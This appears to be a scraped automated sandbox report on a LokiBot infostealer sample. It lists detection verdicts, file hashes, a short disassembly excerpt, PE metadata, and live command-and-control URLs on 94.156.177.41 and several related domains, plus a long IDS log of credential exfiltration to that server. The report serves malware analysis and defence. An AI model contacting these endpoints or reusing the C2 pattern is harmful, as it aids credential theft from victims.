                          SMB/Windows Admin Shares2
                          Data from Local System
                          2
                          Non-Application Layer Protocol
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Deobfuscate/Decode Files or Information
                          NTDS1
                          System Owner/User Discovery
                          Distributed Component Object ModelInput Capture112
                          Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                          Obfuscated Files or Information
                          LSA Secrets1
                          File and Directory Discovery
                          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading
                          Cached Domain Credentials3
                          System Information Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          0yWVteGq5T.exe97%ReversingLabsWin32.Infostealer.LokiBot
                          0yWVteGq5T.exe88%VirustotalBrowse
                          0yWVteGq5T.exe100%AviraTR/Crypt.XPACK.Gen
                          0yWVteGq5T.exe100%Joe Sandbox ML
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          0%Avira URL Cloudsafe
                          http://kbfvzoboss.bid/alien/fre.php100%Avira URL Cloudphishing
                          http://alphastand.win/alien/fre.php100%Avira URL Cloudmalware
                          http://alphastand.trade/alien/fre.php100%Avira URL Cloudmalware
                          http://alphastand.top/alien/fre.php100%Avira URL Cloudphishing
                          http://94.156.177.41/simple/five/fre.php100%Avira URL Cloudmalware
                          No contacted domains info
                          NameMaliciousAntivirus DetectionReputation
                          true
                          • Avira URL Cloud: safe
                          unknown
                          http://kbfvzoboss.bid/alien/fre.phptrue
                          • Avira URL Cloud: phishing
                          unknown
                          http://alphastand.win/alien/fre.phptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://alphastand.trade/alien/fre.phptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://alphastand.top/alien/fre.phptrue
                          • Avira URL Cloud: phishing
                          unknown
                          http://94.156.177.41/simple/five/fre.phptrue
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.ibsensoftware.com/0yWVteGq5T.exefalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            94.156.177.41
                            unknownBulgaria
                            43561NET1-ASBGtrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1571285
                            Start date and time:2024-12-09 08:50:48 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 57s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:4
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:0yWVteGq5T.exe
                            renamed because original name is a hash value
                            Original Sample Name:c046027428e0fb93ae035e318138a2f8d6b5830bc81d825e2f0e8d72e827660c.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/2@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 35
                            • Number of non-executed functions: 6
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            02:51:44API Interceptor55x Sleep call for process: 0yWVteGq5T.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            94.156.177.41CLOSURE DATE FOR THE YEAR.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/kings/five/fre.php
                            Order84746.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/davinci/five/fre.php
                            FVR-N2411-07396.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                            • 94.156.177.41/soja/five/fre.php
                            Scan copy.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                            • 94.156.177.41/simple/five/fre.php
                            file.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/maxzi/five/fre.php
                            Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                            • 94.156.177.41/simple/five/fre.php
                            stthigns.docGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/maxzi/five/fre.php
                            goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                            • 94.156.177.41/maxzi/five/fre.php
                            PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/maxzi/five/fre.php
                            ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                            • 94.156.177.41/simple/five/fre.php
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            NET1-ASBGboatnet.m68k.elfGet hashmaliciousMiraiBrowse
                            • 93.123.85.192
                            boatnet.arm.elfGet hashmaliciousMiraiBrowse
                            • 93.123.85.192
                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                            • 93.123.85.192
                            boatnet.mips.elfGet hashmaliciousMiraiBrowse
                            • 93.123.85.192
                            boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                            • 93.123.85.192
                            boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                            • 93.123.85.192
                            boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                            • 93.123.85.24
                            boatnet.arm.elfGet hashmaliciousMiraiBrowse
                            • 93.123.85.24
                            boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                            • 93.123.85.24
                            boatnet.mips.elfGet hashmaliciousMiraiBrowse
                            • 93.123.85.24
                            No context
                            No context
                            Process:C:\Users\user\Desktop\0yWVteGq5T.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:1
                            Process:C:\Users\user\Desktop\0yWVteGq5T.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):49
                            Entropy (8bit):1.2701062923235522
                            Encrypted:false
                            SSDEEP:3:/l1PL3n:fPL3
                            MD5:CD8FA61AD2906643348EEF98A988B873
                            SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                            SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                            SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:........................................user.
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.340058047768735
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:0yWVteGq5T.exe
                            File size:98'816 bytes
                            MD5:d7ede461fd6438cfae2cba59fa1e07e9
                            SHA1:b6f2dbb0d2ae969583a96b8463ccc561324c7b27
                            SHA256:c046027428e0fb93ae035e318138a2f8d6b5830bc81d825e2f0e8d72e827660c
                            SHA512:3dd06de3fbd5f2e76ec458b4cb3045f265888b8fcfb99451ad6ec960dc1e592b79393f580dbc2ca4e0cda3d867925949b63815cb9553e143a45d5d28c024a431
                            SSDEEP:1536:6zvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqnIzmd:hSHIG6mQwGmfOQd8YhY0/EKUG
                            TLSH:64A32942B2A5C030F7B74DB2BB73A5B7857E7C332D22C84E9352459A14215E1EB7AB13
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x4139de
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:0239fd611af3d0e9b0c46c5837c80e09
                            Instruction
                            push ebp
                            mov ebp, esp
                            push ecx
                            and dword ptr [ebp-04h], 00000000h
                            lea eax, dword ptr [ebp-04h]
                            push esi
                            push edi
                            push eax
                            call 00007F1614B67599h
                            push eax
                            call 00007F1614B67576h
                            xor esi, esi
                            mov edi, eax
                            pop ecx
                            pop ecx
                            cmp dword ptr [ebp-04h], esi
                            jle 00007F1614B67756h
                            push 004188BCh
                            push dword ptr [edi+esi*4]
                            call 00007F1614B59C25h
                            pop ecx
                            pop ecx
                            test eax, eax
                            je 00007F1614B6773Dh
                            push 00002710h
                            call 00007F1614B5A4DAh
                            pop ecx
                            inc esi
                            cmp esi, dword ptr [ebp-04h]
                            jl 00007F1614B6770Eh
                            push 00000000h
                            call 00007F1614B6756Eh
                            push 00000000h
                            call 00007F1614B67882h
                            pop ecx
                            pop edi
                            xor eax, eax
                            pop esi
                            mov esp, ebp
                            pop ebp
                            retn 0010h
                            push ebp
                            mov ebp, esp
                            xor eax, eax
                            push eax
                            push eax
                            push E567384Dh
                            push eax
                            call 00007F1614B56EC9h
                            push dword ptr [ebp+08h]
                            call eax
                            pop ebp
                            ret
                            push ebp
                            mov ebp, esp
                            push esi
                            mov esi, dword ptr [ebp+08h]
                            test esi, esi
                            je 00007F1614B67794h
                            push esi
                            call 00007F1614B599F0h
                            pop ecx
                            test eax, eax
                            je 00007F1614B67789h
                            push esi
                            call 00007F1614B57A2Ch
                            pop ecx
                            test eax, eax
                            je 00007F1614B6777Eh
                            mov eax, dword ptr [0049FDECh]
                            cmp dword ptr [ebp+10h], 00000000h
                            cmovne eax, dword ptr [ebp+10h]
                            push eax
                            push dword ptr [0049FDE8h]
                            call 00007F1614B59424h
                            push dword ptr [ebp+0Ch]
                            push dword ptr [0049FDE8h]
                            call 00007F1614B59416h
                            push 00000000h
                            push 00000000h
                            push esi
                            Programming Language:
                            • [ C ] VS2008 SP1 build 30729
                            • [ASM] VS2003 (.NET) build 3077
                            • [ASM] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [C++] VS2013 UPD5 build 40629
                            • [LNK] VS2013 UPD5 build 40629
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x18ed00x64.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x140000x1380094fa411af1cc6bb168a3ea0e66e80f78False0.5685096153846154data6.49204829439013IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x150000x50000x42006ada3db9ddb6e4994558f8fd80a5cd3fFalse0.3701467803030303data4.2685971103623865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .data0x1a0000x860000x200955b3a57edf41d6c47c7225e8d847f91False0.056640625OpenPGP Public Key0.32171607431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .x0xa00000x20000x200b9e3e5990c2d44bf83df2063f8e8e2cbFalse0.21875data1.957748567000045IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            DLLImport
                            WS2_32.dllgetaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
                            KERNEL32.dllGetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
                            ole32.dllCoCreateInstance, CoInitialize, CoUninitialize
                            OLEAUT32.dllVariantInit, SysFreeString, SysAllocString
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-12-09T08:51:32.799150+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.65003294.156.177.4180TCP
                            2024-12-09T08:51:32.799150+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.65003294.156.177.4180TCP
                            2024-12-09T08:51:39.566096+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64970794.156.177.4180TCP
                            2024-12-09T08:51:39.566096+01002025381ET MALWARE LokiBot Checkin1192.168.2.64970794.156.177.4180TCP
                            2024-12-09T08:51:39.566096+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64970794.156.177.4180TCP
                            2024-12-09T08:51:40.997887+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.64970794.156.177.4180TCP
                            2024-12-09T08:51:41.388226+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64970894.156.177.4180TCP
                            2024-12-09T08:51:41.388226+01002025381ET MALWARE LokiBot Checkin1192.168.2.64970894.156.177.4180TCP
                            2024-12-09T08:51:41.388226+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64970894.156.177.4180TCP
                            2024-12-09T08:51:43.112123+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.64970894.156.177.4180TCP
                            2024-12-09T08:51:43.494161+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64971094.156.177.4180TCP
                            2024-12-09T08:51:43.494161+01002025381ET MALWARE LokiBot Checkin1192.168.2.64971094.156.177.4180TCP
                            2024-12-09T08:51:43.494161+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64971094.156.177.4180TCP
                            2024-12-09T08:51:44.928264+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64971094.156.177.4180TCP
                            2024-12-09T08:51:44.928264+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64971094.156.177.4180TCP
                            2024-12-09T08:51:45.047544+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649710TCP
                            2024-12-09T08:51:45.316994+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64971294.156.177.4180TCP
                            2024-12-09T08:51:45.316994+01002025381ET MALWARE LokiBot Checkin1192.168.2.64971294.156.177.4180TCP
                            2024-12-09T08:51:45.316994+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64971294.156.177.4180TCP
                            2024-12-09T08:51:46.616642+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64971294.156.177.4180TCP
                            2024-12-09T08:51:46.616642+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64971294.156.177.4180TCP
                            2024-12-09T08:51:46.735993+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649712TCP
                            2024-12-09T08:51:46.997946+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64971394.156.177.4180TCP
                            2024-12-09T08:51:46.997946+01002025381ET MALWARE LokiBot Checkin1192.168.2.64971394.156.177.4180TCP
                            2024-12-09T08:51:46.997946+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64971394.156.177.4180TCP
                            2024-12-09T08:51:48.439293+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64971394.156.177.4180TCP
                            2024-12-09T08:51:48.439293+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64971394.156.177.4180TCP
                            2024-12-09T08:51:48.558599+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649713TCP
                            2024-12-09T08:51:48.825174+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64971594.156.177.4180TCP
                            2024-12-09T08:51:48.825174+01002025381ET MALWARE LokiBot Checkin1192.168.2.64971594.156.177.4180TCP
                            2024-12-09T08:51:48.825174+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64971594.156.177.4180TCP
                            2024-12-09T08:51:50.109741+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64971594.156.177.4180TCP
                            2024-12-09T08:51:50.109741+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64971594.156.177.4180TCP
                            2024-12-09T08:51:50.229157+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649715TCP
                            2024-12-09T08:51:50.500278+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64972194.156.177.4180TCP
                            2024-12-09T08:51:50.500278+01002025381ET MALWARE LokiBot Checkin1192.168.2.64972194.156.177.4180TCP
                            2024-12-09T08:51:50.500278+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64972194.156.177.4180TCP
                            2024-12-09T08:51:52.322198+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64972194.156.177.4180TCP
                            2024-12-09T08:51:52.322198+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64972194.156.177.4180TCP
                            2024-12-09T08:51:52.441798+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649721TCP
                            2024-12-09T08:51:52.709648+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64972694.156.177.4180TCP
                            2024-12-09T08:51:52.709648+01002025381ET MALWARE LokiBot Checkin1192.168.2.64972694.156.177.4180TCP
                            2024-12-09T08:51:52.709648+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64972694.156.177.4180TCP
                            2024-12-09T08:51:53.986106+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64972694.156.177.4180TCP
                            2024-12-09T08:51:53.986106+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64972694.156.177.4180TCP
                            2024-12-09T08:51:54.105409+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649726TCP
                            2024-12-09T08:51:54.371881+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64973294.156.177.4180TCP
                            2024-12-09T08:51:54.371881+01002025381ET MALWARE LokiBot Checkin1192.168.2.64973294.156.177.4180TCP
                            2024-12-09T08:51:54.371881+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64973294.156.177.4180TCP
                            2024-12-09T08:51:55.804149+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64973294.156.177.4180TCP
                            2024-12-09T08:51:55.804149+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64973294.156.177.4180TCP
                            2024-12-09T08:51:55.923388+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649732TCP
                            2024-12-09T08:51:56.186859+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64973694.156.177.4180TCP
                            2024-12-09T08:51:56.186859+01002025381ET MALWARE LokiBot Checkin1192.168.2.64973694.156.177.4180TCP
                            2024-12-09T08:51:56.186859+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64973694.156.177.4180TCP
                            2024-12-09T08:52:00.480412+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64973694.156.177.4180TCP
                            2024-12-09T08:52:00.480412+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64973694.156.177.4180TCP
                            2024-12-09T08:52:00.604257+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649736TCP
                            2024-12-09T08:52:00.874032+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64975594.156.177.4180TCP
                            2024-12-09T08:52:00.874032+01002025381ET MALWARE LokiBot Checkin1192.168.2.64975594.156.177.4180TCP
                            2024-12-09T08:52:00.874032+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64975594.156.177.4180TCP
                            2024-12-09T08:52:02.310802+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64975594.156.177.4180TCP
                            2024-12-09T08:52:02.310802+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64975594.156.177.4180TCP
                            2024-12-09T08:52:02.430253+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649755TCP
                            2024-12-09T08:52:02.924152+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64975794.156.177.4180TCP
                            2024-12-09T08:52:02.924152+01002025381ET MALWARE LokiBot Checkin1192.168.2.64975794.156.177.4180TCP
                            2024-12-09T08:52:02.924152+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64975794.156.177.4180TCP
                            2024-12-09T08:52:07.215515+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64975794.156.177.4180TCP
                            2024-12-09T08:52:07.215515+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64975794.156.177.4180TCP
                            2024-12-09T08:52:07.334848+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649757TCP
                            2024-12-09T08:52:07.593802+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64977394.156.177.4180TCP
                            2024-12-09T08:52:07.593802+01002025381ET MALWARE LokiBot Checkin1192.168.2.64977394.156.177.4180TCP
                            2024-12-09T08:52:07.593802+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64977394.156.177.4180TCP
                            2024-12-09T08:52:09.028698+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64977394.156.177.4180TCP
                            2024-12-09T08:52:09.028698+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64977394.156.177.4180TCP
                            2024-12-09T08:52:09.148041+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649773TCP
                            2024-12-09T08:52:09.406949+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64977594.156.177.4180TCP
                            2024-12-09T08:52:09.406949+01002025381ET MALWARE LokiBot Checkin1192.168.2.64977594.156.177.4180TCP
                            2024-12-09T08:52:09.406949+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64977594.156.177.4180TCP
                            2024-12-09T08:52:10.848504+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64977594.156.177.4180TCP
                            2024-12-09T08:52:10.848504+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64977594.156.177.4180TCP
                            2024-12-09T08:52:10.967759+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649775TCP
                            2024-12-09T08:52:11.232353+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64978194.156.177.4180TCP
                            2024-12-09T08:52:11.232353+01002025381ET MALWARE LokiBot Checkin1192.168.2.64978194.156.177.4180TCP
                            2024-12-09T08:52:11.232353+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64978194.156.177.4180TCP
                            2024-12-09T08:52:13.030024+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64978194.156.177.4180TCP
                            2024-12-09T08:52:13.030024+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64978194.156.177.4180TCP
                            2024-12-09T08:52:13.150006+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649781TCP
                            2024-12-09T08:52:13.423061+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64978794.156.177.4180TCP
                            2024-12-09T08:52:13.423061+01002025381ET MALWARE LokiBot Checkin1192.168.2.64978794.156.177.4180TCP
                            2024-12-09T08:52:13.423061+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64978794.156.177.4180TCP
                            2024-12-09T08:52:15.247122+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64978794.156.177.4180TCP
                            2024-12-09T08:52:15.247122+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64978794.156.177.4180TCP
                            2024-12-09T08:52:15.380232+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649787TCP
                            2024-12-09T08:52:15.682605+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64979394.156.177.4180TCP
                            2024-12-09T08:52:15.682605+01002025381ET MALWARE LokiBot Checkin1192.168.2.64979394.156.177.4180TCP
                            2024-12-09T08:52:15.682605+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64979394.156.177.4180TCP
                            2024-12-09T08:52:16.935958+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64979394.156.177.4180TCP
                            2024-12-09T08:52:16.935958+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64979394.156.177.4180TCP
                            2024-12-09T08:52:17.055207+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649793TCP
                            2024-12-09T08:52:17.325150+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64979994.156.177.4180TCP
                            2024-12-09T08:52:17.325150+01002025381ET MALWARE LokiBot Checkin1192.168.2.64979994.156.177.4180TCP
                            2024-12-09T08:52:17.325150+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64979994.156.177.4180TCP
                            2024-12-09T08:52:21.764409+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64979994.156.177.4180TCP
                            2024-12-09T08:52:21.764409+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64979994.156.177.4180TCP
                            2024-12-09T08:52:21.883707+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649799TCP
                            2024-12-09T08:52:22.154447+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64981194.156.177.4180TCP
                            2024-12-09T08:52:22.154447+01002025381ET MALWARE LokiBot Checkin1192.168.2.64981194.156.177.4180TCP
                            2024-12-09T08:52:22.154447+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.64981194.156.177.4180TCP
                            2024-12-09T08:52:23.587495+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.64981194.156.177.4180TCP
                            2024-12-09T08:52:23.587495+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.64981194.156.177.4180TCP
                            2024-12-09T08:52:23.706862+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.649811TCP
                            2024-12-09T08:52:23.972500+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.64981894.156.177.4180TCP
                            2024-12-09T08:52:23.972500+01002025381ET MALWARE LokiBot Checkin1192.168.2.64981894.156.177.4180TCP
